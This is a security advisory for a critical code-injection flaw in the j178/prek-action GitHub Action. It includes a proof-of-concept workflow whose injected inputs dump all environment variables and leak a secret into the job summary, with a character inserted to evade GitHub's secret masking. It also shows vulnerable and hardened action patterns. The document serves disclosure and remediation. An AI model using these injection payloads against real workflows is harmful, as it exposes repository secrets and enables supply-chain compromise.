PT-2025-42410 · Github Actions · J178/Prek-Action
Published: 2025-09-29 · Updated: 2025-09-29
CVSS v3.1: 9.9 (Critical)
| Vector | AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
Summary
There are three arbitrary code injection vectors in the composite action defined in action.yml.
Details
The GitHub Action inputs `inputs.prek-version`, `inputs.extra_args`, and `inputs.extra-args` can be used to execute arbitrary code in the context of the action.
PoC
```yaml
- uses: j178/prek-action@v1.0.5
  with:
    prek-version: $(printenv >> $GITHUB_STEP_SUMMARY && echo "0.2.2")
    extra_args: '&& echo "MY_SECRET with a character is: ${MY_SECRET:0:1}a${MY_SECRET:1}" >> $GITHUB_STEP_SUMMARY && echo ""'
  env:
    MY_SECRET: ${{ secrets.MY_SECRET }}
```
The example above writes every environment variable to the workflow summary and exposes the value of the `MY_SECRET` environment variable there (the inserted character keeps GitHub's secret masking from redacting it). An attacker could use this vector to compromise the target repository while going unnoticed, because the action still runs normally.
Impact
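The root cause is a composite action splicing its inputs directly into a `run:` shell script. The following is an added illustration of that pattern beside the standard hardening (passing inputs through `env:` and referencing them as quoted shell variables); it is not the project's actual action.yml, and the step names, the `PREK_VERSION`/`PREK_EXTRA_ARGS` variable names and the `prek` invocation are assumptions.

```yaml
# Vulnerable pattern (hypothetical reconstruction, not the real action.yml).
# The input text is substituted into the script before bash runs it, so
# $(...) and && sequences inside the input become shell code.
runs:
  using: composite
  steps:
    - name: Install and run prek (vulnerable)
      shell: bash
      run: |
        pip install "prek==${{ inputs.prek-version }}"
        prek run --all-files ${{ inputs.extra-args }}
---
# Hardened pattern: the expression is evaluated into an environment
# variable, and the script only ever sees it as data.
runs:
  using: composite
  steps:
    - name: Install and run prek (hardened)
      shell: bash
      env:
        PREK_VERSION: ${{ inputs.prek-version }}
        PREK_EXTRA_ARGS: ${{ inputs.extra-args }}
      run: |
        # Reject anything that is not a plain version string before use.
        if ! [[ "$PREK_VERSION" =~ ^[0-9]+(\.[0-9]+)*$ ]]; then
          echo "invalid prek-version: $PREK_VERSION" >&2
          exit 1
        fi
        pip install "prek==$PREK_VERSION"
        # Split extra args on whitespace only; metacharacters such as
        # '&&' stay literal arguments instead of being interpreted.
        read -r -a extra <<< "$PREK_EXTRA_ARGS"
        prek run --all-files "${extra[@]}"
```

In the hardened form the PoC values above would fail the version check or be passed to `prek` as literal arguments, and nothing is appended to `$GITHUB_STEP_SUMMARY`.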
Critical, CWE-94
Fix
Code Injection
Weakness Enumeration
Related Identifiers
Affected Products
J178/Prek-Action